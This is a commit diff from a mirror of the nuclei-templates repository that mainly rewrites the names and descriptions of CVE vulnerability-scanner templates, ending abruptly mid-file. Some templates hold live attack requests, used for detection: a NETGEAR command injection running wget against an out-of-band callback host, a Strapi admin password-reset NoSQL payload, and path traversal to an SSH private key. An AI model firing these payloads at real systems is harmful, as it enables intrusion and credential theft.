daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Dashboard Content Enhancements (#4031) 

Dashboard Content Enhancements
patch-1
MostInterestingBotInTheWorld 2022-04-07 09:53:15 -04:00 committed by GitHub
parent a27f2048df
commit a24ef794b7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
50 changed files with 380 additions and 232 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
cves/2012/CVE-2012-1823.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2012-1823
info:
name: PHP CGI v5.3.12/5.4.2 RCE
name: PHP CGI v5.3.12/5.4.2 Remote Code Execution
author: pikpikcu
severity: critical
reference:
@ -9,10 +9,9 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2012-1823
description: |
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
remediation: Upgrade to a supported version.
tags: rce,php,cve,cve2012
classification:
cve-id: CVE-2012-1823
tags: rce,php,cve,cve2012
requests:
- raw:
@ -25,7 +24,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
@ -35,4 +33,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/18
# Enhanced by mp on 2022/04/04

6
cves/2014/CVE-2014-2321.yaml
View File

@ -2,11 +2,13 @@ id: CVE-2014-2321
info:
name: ZTE Cable Modem Web Shell
description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
description: |
ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
author: geeknik
reference:
- https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/
- https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/
- https://nvd.nist.gov/vuln/detail/CVE-2014-2321
severity: high
classification:
cve-id: CVE-2014-2321
@ -30,4 +32,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/03/31
# Enhanced by mp on 2022/04/01

31
cves/2016/CVE-2016-1555.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2016-1555
info:
name: NETGEAR WNAP320 Access Point Firmware Remote Command Execution
author: gy741
severity: critical
description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
reference:
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
- https://nvd.nist.gov/vuln/detail/CVE-2016-1555
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2016-1555
cwe-id: CWE-77
tags: netgear,rce,oast,router
requests:
- raw:
- |
POST /boardDataWW.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

8
cves/2016/CVE-2016-4977.yaml
View File

@ -4,16 +4,18 @@ info:
name: Spring Security OAuth2 Remote Command Execution
author: princechaddha
severity: high
description: When processing authorization requests using the whitelabel views in Spring Security OAuth 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote code execution via the crafting of the value for response_type.
description: "Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type."
remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.
reference:
- https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
- https://tanzu.vmware.com/security/cve-2016-4977
- https://nvd.nist.gov/vuln/detail/CVE-2016-4977
tags: cve,cve2016,spring,oauth2,oauth,rce,ssti
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2016-4977
cwe-id: CWE-19
tags: cve,cve2016,spring,oauth2,oauth,rce,ssti
requests:
- method: GET
@ -30,3 +32,5 @@ requests:
- type: status
status:
- 400
# Enhanced by mp on 2022/04/04

10
cves/2017/CVE-2017-10271.yaml
View File

@ -1,18 +1,20 @@
id: CVE-2017-10271
info:
name: CVE-2017-10271
name: Oracle WebLogic Server Component Remote Command Execution
author: dr_set
severity: high
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to component deserialization remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Unauthenticated attackers with network access via T3 can leverage this vulnerability to compromise Oracle WebLogic Server.
reference:
- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
tags: cve,cve2017,rce,oracle,weblogic,oast
- https://www.oracle.com/security-alerts/cpuoct2017.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-10271
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.50
cve-id: CVE-2017-10271
tags: cve,cve2017,rce,oracle,weblogic,oast
requests:
- raw:
@ -59,3 +61,5 @@ requests:
- type: status
status:
- 500
# Enhanced by mp on 2022/04/05

9
cves/2017/CVE-2017-14535.yaml
View File

@ -1,19 +1,20 @@
id: CVE-2017-14535
info:
name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability
name: Trixbox - 2.8.0.4 OS Command Injection
author: pikpikcu
severity: high
description: "Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php."
reference:
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913
tags: cve,cve2017,trixbox,rce,injection
- https://nvd.nist.gov/vuln/detail/CVE-2017-14535
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2017-14535
cwe-id: CWE-78
description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php."
tags: cve,cve2017,trixbox,rce,injection
requests:
- raw:
@ -36,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/01

10
cves/2017/CVE-2017-14537.yaml
View File

@ -1,20 +1,20 @@
id: CVE-2017-14537
info:
name: trixbox 2.8.0 - directory-traversal
name: Trixbox 2.8.0 Path Traversal
author: pikpikcu
severity: medium
tags: cve,cve2017,trixbox,lfi
description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
description: "Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
- https://sourceforge.net/projects/asteriskathome/ # vendor homepage
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.50
cve-id: CVE-2017-14537
cwe-id: CWE-22
tags: cve,cve2017,trixbox,lfi
requests:
- raw:
@ -47,3 +47,5 @@ requests:
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/04/01

6
cves/2017/CVE-2017-3506.yaml
View File

@ -3,9 +3,8 @@ id: CVE-2017-3506
info:
name: Oracle Weblogic Remote OS Command Execution
author: pdteam
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
severity: high
tags: cve,cve2017,weblogic,oracle,rce,oast
reference:
- https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
@ -13,6 +12,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 7.40
cve-id: CVE-2017-3506
tags: cve,cve2017,weblogic,oracle,rce,oast
requests:
- raw:
@ -44,3 +44,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/04/05

12
cves/2017/CVE-2017-6090.yaml
View File

@ -1,17 +1,19 @@
id: CVE-2017-6090
info:
name: PhpCollab (unauthenticated) Arbitrary File Upload
name: PhpColl 2.5.1 Arbitrary File Upload
author: pikpikcu
severity: high
tags: cve,cve2017,phpcollab,rce,fileupload
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090
reference:
- https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/
- https://nvd.nist.gov/vuln/detail/CVE-2017-6090
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2017-6090
cwe-id: CWE-434
description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/."
description: "PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php."
tags: cve,cve2017,phpcollab,rce,fileupload
requests:
- raw:
@ -42,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/06

15
cves/2018/CVE-2018-14728.yaml
View File

@ -1,19 +1,20 @@
id: CVE-2018-14728
info:
name: Responsive filemanager 9.13.1 - SSRF/LFI
name: Responsive filemanager 9.13.1 Server-Side Request Forgery
author: madrobot
severity: critical
tags: cve,cve2018,ssrf,lfi
description: "Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter."
reference:
- http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
- https://www.exploit-db.com/exploits/45103/
- https://nvd.nist.gov/vuln/detail/CVE-2018-14728
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-14728
cwe-id: CWE-918
description: "upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter."
reference:
- http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
- https://www.exploit-db.com/exploits/45103/
tags: cve,cve2018,ssrf,lfi
requests:
- method: POST
@ -27,3 +28,5 @@ requests:
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/04/01

9
cves/2018/CVE-2018-15517.yaml
View File

@ -1,18 +1,19 @@
id: CVE-2018-15517
info:
name: D-LINK Central WifiManager - SSRF
description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser.
name: D-LINK Central WifiManager Server-Side Request Forgery
description: "D-LINK Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser."
reference:
- http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517
author: gy741
severity: high
tags: cve,cve2018,dlink,ssrf,oast
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
cvss-score: 8.60
cve-id: CVE-2018-15517
cwe-id: CWE-918
tags: cve,cve2018,dlink,ssrf,oast
requests:
- method: GET
@ -24,3 +25,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/04/06

9
cves/2018/CVE-2018-2791.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2018-2791
info:
name: Oracle WebCenter Sites Multiple XSS
name: Oracle WebCenter Sites Cross-Site Scripting
author: madrobot,leovalcante
severity: high
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware.
description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.20
@ -15,6 +15,7 @@ info:
- http://www.securityfocus.com/bid/103800
- https://www.exploit-db.com/exploits/44752/
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2018-2791
tags: cve,cve2018,oracle,xss,wcs
requests:
@ -40,4 +41,6 @@ requests:
words:
- '<script>alert(24)</script>'
- 'Missing translation key'
condition: and
condition: and
# Enhanced by mp on 2022/04/06

9
cves/2018/CVE-2018-7490.yaml
View File

@ -1,20 +1,21 @@
id: CVE-2018-7490
info:
name: uWSGI PHP Plugin Directory Traversal
name: uWSGI PHP Plugin Local File Inclusion
author: madrobot
severity: high
tags: cve,cve2018,uwsgi,php,lfi,plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2018-7490
cwe-id: CWE-22
description: "uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal."
description: "uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion."
reference:
- https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
- https://www.exploit-db.com/exploits/44223/
- https://www.debian.org/security/2018/dsa-4142
- https://nvd.nist.gov/vuln/detail/CVE-2018-7490
tags: cve,cve2018,uwsgi,php,lfi,plugin
requests:
- method: GET
@ -30,3 +31,5 @@ requests:
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/04/01

8
cves/2019/CVE-2019-13392.yaml
View File

@ -1,14 +1,16 @@
id: CVE-2019-13392
info:
name: MindPalette NateMail 3.0.15 - (XSS)
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
author: pikpikcu
severity: medium
description: reflected Cross-Site Scripting (XSS) vulnerability in MindPalette NateMail 3.0.15 allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
reference:
- https://www.doyler.net/security-not-included/natemail-vulnerabilities
- https://mindpalette.com/tag/natemail/
- https://nvd.nist.gov/vuln/detail/CVE-2019-13392
tags: cve,cve2019,natemail,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -37,3 +39,5 @@ requests:
part: header
words:
- text/html
# Enhanced by mp on 2022/04/04

14
cves/2019/CVE-2019-18818.yaml
View File

@ -1,20 +1,20 @@
id: CVE-2019-18818
info:
name: Strapi CMS - Admin password reset (Unauthenticated)
name: strapi CMS Unauthenticated Admin Password Reset
author: idealphase
description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
severity: critical
description: "strapi CMS before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js."
reference:
- https://github.com/advisories/GHSA-6xc2-mj39-q599
- https://www.exploit-db.com/exploits/50239
- https://nvd.nist.gov/vuln/detail/CVE-2019-18818
severity: critical
tags: cve,cve2019,strapi,auth-bypass,intrusive
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2019-18818
cwe-id: CWE-640
tags: cve,cve2019,strapi,auth-bypass,intrusive
requests:
- raw:
@ -23,9 +23,7 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
matchers-condition: and
matchers:
- type: status
@ -49,4 +47,6 @@ requests:
- type: json
json:
- .user.username
- .user.email
- .user.email
# Enhanced by mp on 2022/04/01

15
cves/2019/CVE-2019-2578.yaml
View File

@ -1,17 +1,18 @@
id: CVE-2019-2578
info:
name: Broken Access Control Oracle WebCenter Sites
name: Oracle WebCenter Sites Broken Access Control
author: leovalcante
severity: high
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
tags: cve,cve2019,oracle,wcs,auth-bypass
description: "Oracle WebCenter Sites 12.2.1.3.0 (a component of Oracle Fusion Middleware) suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data."
reference:
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2019-2578
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.60
cve-id: CVE-2019-2578
tags: cve,cve2019,oracle,wcs,auth-bypass
requests:
- raw:
@ -28,4 +29,6 @@ requests:
- type: regex
part: body
regex:
- '<script[\d\D]*<throwexception/>'
- '<script[\d\D]*<throwexception/>'
# Enhanced by mp on 2022/04/06

12
cves/2019/CVE-2019-6715.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2019-6715
info:
name: CVE-2019-6715
name: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
author: randomrobbie
severity: high
description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF
tags: cve,cve2019,wordpress,wp-plugin,ssrf
description: |
WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
@ -13,6 +13,8 @@ info:
reference:
- https://vinhjaxt.github.io/2019/03/cve-2019-6715
- http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-6715
tags: cve,cve2019,wordpress,wp-plugin,ssrf
requests:
- raw:
@ -27,4 +29,6 @@ requests:
- type: word
words:
- "TmVzc3VzQ29kZUV4ZWNUZXN0"
part: body
part: body
# Enhanced by mp on 2022/04/05

12
cves/2020/CVE-2020-11991.yaml
View File

@ -4,15 +4,17 @@ info:
name: Apache Cocoon 2.1.12 XML Injection
author: pikpikcu
severity: high
tags: cve,cve2020,apache,xml,cocoon,xxe
description: When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
remediation: Upgrade to Apache Cocon 2.1.13 or later.
reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
remediation: Upgrade to Apache Cocoon 2.1.13 or later.
reference:
- https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
- https://nvd.nist.gov/vuln/detail/CVE-2020-11991
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-11991
cwe-id: CWE-611
tags: cve,cve2020,apache,xml,cocoon,xxe
requests:
- method: POST
@ -39,4 +41,4 @@ requests:
status:
- 200
# Enhanced by cs on 2022/02/25
# Enhanced by mp on 2022/04/05

13
cves/2020/CVE-2020-12116.yaml
View File

@ -4,14 +4,17 @@ info:
name: Unauthenticated Zoho ManageEngine OpManger Arbitrary File Read
author: dwisiswant0
severity: high
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
tags: cve,cve2020,zoho,lfi,manageengine
reference: https://github.com/BeetleChunks/CVE-2020-12116
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
reference:
- https://github.com/BeetleChunks/CVE-2020-12116
- https://nvd.nist.gov/vuln/detail/CVE-2020-12116
- https://www.manageengine.com/network-monitoring/help/read-me-complete.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-12116
cwe-id: CWE-22
tags: cve,cve2020,zoho,lfi,manageengine
requests:
- raw:
@ -22,7 +25,7 @@ requests:
Connection: close
- |
GET §endpoint§../../../../bin/.ssh_host_rsa_key HTTP/1.1
GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: {{Hostname}}
Accept: */*
Cache-Control: max-age=0
@ -44,3 +47,5 @@ requests:
- 'contains(body_2, "BEGIN RSA PRIVATE KEY")'
- 'status_code_2 == 200'
condition: and
# Enhanced by mp on 2022/04/04

12
cves/2020/CVE-2020-12720.yaml
View File

@ -1,17 +1,19 @@
id: CVE-2020-12720
info:
name: CVE-2020-12720 vBulletin SQLI
name: vBulletin SQL Injection
author: pdteam
severity: critical
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
tags: cve,cve2020,vbulletin,sqli
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks.
reference:
- https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
- https://nvd.nist.gov/vuln/detail/CVE-2020-12720
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2020-12720
cwe-id: CWE-89,CWE-306
tags: cve,cve2020,vbulletin,sqli
requests:
- raw:
@ -28,3 +30,5 @@ requests:
- type: word
words:
- "vbulletinrce"
# Enhanced by mp on 2022/04/01

12
cves/2020/CVE-2020-14883.yaml
View File

@ -1,16 +1,18 @@
id: CVE-2020-14883
info:
name: Oracle WebLogic Server Administration Console Handle RCE
name: Oracle WebLogic Server Administration Console Remote Code Execution
author: pdteam
severity: high
description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
tags: cve,cve2020,oracle,rce,weblogic
description: The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.
reference:
- https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.20
cve-id: CVE-2020-14883
tags: cve,cve2020,oracle,rce,weblogic
requests:
- method: POST
@ -34,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/05

12
cves/2020/CVE-2020-17362.yaml
View File

@ -1,17 +1,19 @@
id: CVE-2020-17362
info:
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
tags: cve,cve2020,wordpress,xss,wp-plugin
description: "Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php."
reference:
- https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
- https://nvd.nist.gov/vuln/detail/CVE-2020-17362
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-17362
cwe-id: CWE-79
tags: cve,cve2020,wordpress,xss,wp-plugin
requests:
- method: GET
@ -38,3 +40,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/04

14
cves/2020/CVE-2020-17496.yaml
View File

@ -1,17 +1,19 @@
id: CVE-2020-17496
info:
name: vBulletin Pre-Auth RCE
name: vBulletin Pre-Auth Remote Command Execution
author: pussycat0x
severity: critical
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
description: |
vBulletin 5.5.4 through 5.6.2 allow remote command execution (RCE) via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
tags: cve,cve2020,vbulletin,rce
description: "vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759."
reference:
- https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
- https://nvd.nist.gov/vuln/detail/CVE-2020-17496
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2020-17496
cwe-id: CWE-74
tags: cve,cve2020,vbulletin,rce
requests:
- raw:
@ -31,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/01

14
cves/2020/CVE-2020-35774.yaml
View File

@ -1,18 +1,20 @@
id: CVE-2020-35774
info:
name: Twitter Server XSS
name: twitter-server Cross-Site Scripting
author: pikpikcu
severity: medium
description: |
